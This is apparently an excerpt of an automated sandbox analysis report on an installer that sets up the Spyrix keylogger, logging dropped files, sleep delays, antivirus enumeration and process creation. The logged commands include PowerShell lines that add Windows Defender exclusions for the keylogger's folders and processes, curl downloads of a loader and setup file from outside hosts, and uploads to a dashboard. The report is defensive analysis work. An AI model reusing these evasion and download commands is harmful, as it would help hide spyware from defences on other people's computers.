            Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmpDropped PE file which has not been started: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\ff.exe (copy)Jump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmpDropped PE file which has not been started: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-S45KB.tmpJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmpDropped PE file which has not been started: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-83S41.tmpJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-NKDPA.tmp\_isetup\_iscrypt.dllJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-NKDPA.tmp\webbrowser.dllJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-NKDPA.tmp\_isetup\_isdecmp.dllJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmpDropped PE file which has not been started: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-RPIHK.tmpJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmpDropped PE file which has not been started: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\unins000.exe (copy)Jump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmpDropped PE file which has not been started: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-PQPA7.tmpJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmpDropped PE file which has not been started: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\libeay32.dll (copy)Jump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmpDropped PE file which has not been started: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-B6QNS.tmpJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmpDropped PE file which has not been started: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-KK513.tmpJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-NKDPA.tmp\_isetup\_setup64.tmpJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmpDropped PE file which has not been started: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-DN3K6.tmpJump to dropped file
            Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exeAPI coverage: 7.5 %
            Source: C:\Users\user\Desktop\404.exe TID: 6752Thread sleep time: -30437127721620741s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\404.exe TID: 5916Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1648Thread sleep count: 7681 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6936Thread sleep count: 1854 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2404Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4900Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8172Thread sleep count: 6697 > 30
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8172Thread sleep count: 3102 > 30
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2064Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1732Thread sleep count: 1937 > 30
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1732Thread sleep count: 7684 > 30
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1840Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4064Thread sleep count: 8131 > 30
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2348Thread sleep count: 1386 > 30
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6740Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 812Thread sleep count: 7831 > 30
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2912Thread sleep count: 1781 > 30
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5464Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3740Thread sleep count: 1007 > 30
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3740Thread sleep count: 8505 > 30
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4360Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7452Thread sleep count: 6878 > 30
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7452Thread sleep count: 2764 > 30
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7464Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4196Thread sleep count: 6329 > 30
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4196Thread sleep count: 2795 > 30
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6192Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1416Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5404Thread sleep count: 8129 > 30
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4636Thread sleep count: 1518 > 30
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7640Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4876Thread sleep count: 7783 > 30
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5760Thread sleep count: 1798 > 30
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5592Thread sleep time: -922337203685477s >= -30000s
            Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe TID: 5140Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\SysWOW64\timeout.exe TID: 3912Thread sleep count: 127 > 30
            Source: C:\Windows\SysWOW64\timeout.exe TID: 5744Thread sleep count: 47 > 30
            Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmpKey opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\08070809Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmpKey opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\04070809Jump to behavior
            Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exeKey opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\08070809
            Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exeKey opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\04070809
            Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spmm.exeKey opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\08070809
            Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spmm.exeKey opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\04070809
            Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_ComputerSystem
            Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exeCode function: 51_2_0040AC68 FindFirstFileW,FindClose,51_2_0040AC68
            Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exeCode function: 51_2_0040A700 lstrcpynW,lstrcpynW,lstrcpynW,FindFirstFileW,FindClose,lstrlenW,lstrcpynW,lstrlenW,lstrcpynW,51_2_0040A700
            Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exeCode function: 51_2_033A75E8 FindFirstFileA,51_2_033A75E8
            Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exeCode function: 51_2_033A76C4 FindFirstFileA,GetLastError,51_2_033A76C4
            Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exeCode function: 51_2_033A60F2 GetSystemInfo,51_2_033A60F2
            Source: C:\Users\user\Desktop\404.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\Desktop\404.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exeThread delayed: delay time: 922337203685477
            Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
            Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exeFile opened: C:\Users\user
            Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exeFile opened: C:\Users\user\AppData\Roaming
            Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
            Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft
            Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exeFile opened: C:\Users\user\AppData
            Source: 404.exe, 00000000.00000002.1647791601.0000000000722000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000009.00000003.1457700688.0000000002B70000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000000A.00000003.1708845955.0000000002FE0000.00000004.00000020.00020000.00000000.sdmp, spkl.exe, 00000033.00000002.3231347372.000000000181E000.00000004.00000020.00020000.00000000.sdmp, NETSTAT.EXE, 0000003E.00000002.3001411375.000000000297B000.00000004.00000020.00020000.00000000.sdmp, qrl.exe, 00000041.00000002.3108663163.0000000001088000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: spkl.exe, 00000033.00000003.2967766062.0000000004EA0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: @@IdPORT_vmnet
            Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exeAPI call chain: ExitProcess graph end nodegraph_51-28425
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exeCode function: 51_2_033CB8B0 rdtsc 51_2_033CB8B0
            Source: C:\Users\user\Desktop\404.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
            Source: C:\Windows\SysWOW64\taskkill.exeProcess token adjusted: Debug
            Source: C:\Windows\SysWOW64\taskkill.exeProcess token adjusted: Debug
            Source: C:\Windows\SysWOW64\tasklist.exeProcess token adjusted: Debug
            Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exeCode function: 65_2_0023119B SetUnhandledExceptionFilter,__p__acmdln,malloc,strlen,malloc,memcpy,__initenv,_cexit,_amsg_exit,_initterm,exit,65_2_0023119B
            Source: C:\Users\user\Desktop\404.exeMemory allocated: page read and write | page guardJump to behavior

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -exclusionPath "'C:\Users\user~1\AppData\Local\Temp\d55b5edc-beb4-4418-b1de-2b3817e31a87'"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -exclusionPath 'C:\ProgramData\Security Monitor\'
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -exclusionPath 'C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe'
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -exclusionPath 'C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\sps.exe'
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -exclusionPath 'C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spmm.exe'
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -exclusionPath "'C:\Users\user~1\AppData\Local\Temp\d55b5edc-beb4-4418-b1de-2b3817e31a87'"Jump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -exclusionPath 'C:\ProgramData\Security Monitor\'
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -exclusionPath 'C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe'
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -exclusionPath 'C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\sps.exe'
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -exclusionPath 'C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spmm.exe'
            Source: C:\Users\user\Desktop\404.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /c C:\Users\user~1\AppData\Local\Temp\d55b5edc-beb4-4418-b1de-2b3817e31a87\\d55b5edc-beb4-4418-b1de-2b3817e31a87.cmdJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg query "HKU\S-1-5-19\Environment" Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -exclusionPath "'C:\Users\user~1\AppData\Local\Temp\d55b5edc-beb4-4418-b1de-2b3817e31a87'"Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\curl.exe curl.exe --insecure --user-agent "sfk-dst-loader-2.0" -o "C:\Users\user~1\AppData\Local\Temp\d55b5edc-beb4-4418-b1de-2b3817e31a87\l" https://cdnbaynet.com/loader/link.php?prg_id=sfkJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\curl.exe curl.exe --insecure --user-agent "sfk-dst-loader-2.0" -o "C:\Users\user~1\AppData\Local\Temp\d55b5edc-beb4-4418-b1de-2b3817e31a87\404.exe" https://swtb-download.spyrix-sfk.com/download/sfk/sfk_setup.exeJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\d55b5edc-beb4-4418-b1de-2b3817e31a87\404.exe "C:\Users\user~1\AppData\Local\Temp\d55b5edc-beb4-4418-b1de-2b3817e31a87\404.exe"Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmpProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\plist.vbs" Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmpProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\dashboard.cmd" "Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c "wmic /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /value"
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /value
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c "wmic /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /value"
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /value
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg export "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" "C:\Users\user~1\AppData\Local\Temp\is-NKDPA.tmp\ex" /y
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -ExclusionProcess '404.*'
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -exclusionPath 'C:\ProgramData\Security Monitor\'
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -ExclusionProcess 'C:\ProgramData\Security Monitor\*'
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -exclusionPath 'C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe'
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -exclusionPath 'C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\sps.exe'
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -exclusionPath 'C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spmm.exe'
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -ExclusionProcess 'C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe'
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -ExclusionProcess 'C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\sps.exe'
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -ExclusionProcess 'C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spmm.exe'
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg export "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" "C:\Users\user~1\AppData\Local\Temp\is-NKDPA.tmp\ex" /y
            Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exeProcess created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe "C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe" --insecure -d @app_Monitoring_StartButton_83C0CF468771E10150E77501F8BEB4AB https://spyrix.net/dashboard/prg-actions
            Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exeProcess created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe "C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe" --insecure -d @app_Monitoring_Start_83C0CF468771E10150E77501F8BEB4AB https://spyrix.net/dashboard/prg-actions
            Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exeProcess created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe "C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe" --insecure -d @app_Run_First_83C0CF468771E10150E77501F8BEB4AB https://spyrix.net/dashboard/prg-actions
            Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exeProcess created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spmm.exe "C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spmm.exe" "Spyrix Free Keylogger 11.6.22"
            Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exeProcess created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe "C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe" --insecure -d @app_wizard_Start_83C0CF468771E10150E77501F8BEB4AB https://spyrix.net/dashboard/prg-actions
            Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exeProcess created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe "C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe" --insecure -d @app_wizard_Start_83C0CF468771E10150E77501F8BEB4AB https://spyrix.net/dashboard/prg-actions
            Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c plist.cmd
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\chcp.com chcp 65001
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 20
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c exit 83
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c exit 112
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c exit 121
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c exit 114
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c exit 105
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c exit 120
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe TASKLIST /FI "IMAGENAME eq spm.exe" /FO CSV /NH
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\find.exe find "spm"
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 6
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://dashboard.spyrix.com/
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\NETSTAT.EXE netstat.exe -e
